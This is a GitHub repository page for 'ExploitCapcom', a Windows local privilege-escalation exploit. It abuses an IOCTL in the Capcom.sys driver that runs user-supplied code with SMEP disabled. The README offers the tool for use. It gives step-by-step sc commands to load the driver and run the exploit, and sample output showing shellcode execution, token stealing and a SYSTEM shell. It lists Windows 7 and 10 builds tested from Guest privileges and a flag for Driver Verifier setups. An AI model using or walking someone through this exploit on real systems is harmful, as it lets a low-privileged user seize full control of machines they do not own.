Skip to content

This is a standalone exploit for a vulnerable feature in Capcom.sys

License

Notifications You must be signed in to change notification settings

barkink/ExploitCapcom

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

ExploitCapcom

Description

This is a standalone exploit for a vulnerable feature in Capcom.sys. The feature is exposed through IOCTL and to execute an arbitrary user supplied function pointer with disabling SMEP. This exploit simply abuses the feature to perform token stealing to get the SYSTEM privileges, and then launches the command prompt with the elevated privilege.

For more details, see:

Usage

Load the Capcom.sys first, then execute this exploit.

>sc create Capcom type= kernel binPath= C:\Users\user\Desktop\Capcom.sys
>sc start Capcom

>ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000070
[*] Shellcode was placed at 00000288427B0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

You will see a new console running with the SYSTEM privileges.

win10_demo

Tested Platforms

  • Capcom.sys (SHA1: c1d5cf8c43e7679b782630e93f5e6420ca1749a7)
  • Windows 7 x64 SP1 with the Guest privileges
  • Windows 10 x64 Build 19041 (20H1) with the Guest privileges

Note: When Driver Verifier is enabled on Windows 10 20H2 (Build 19042) or later, use the --mitigatedv flag, e.g, ExploitCapcom.exe --mitigatedv. See issue #3 and PR #4 for more details.

License

This software is released under the MIT License, see LICENSE.

About

This is a standalone exploit for a vulnerable feature in Capcom.sys

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C++ 98.0%
  • C 2.0%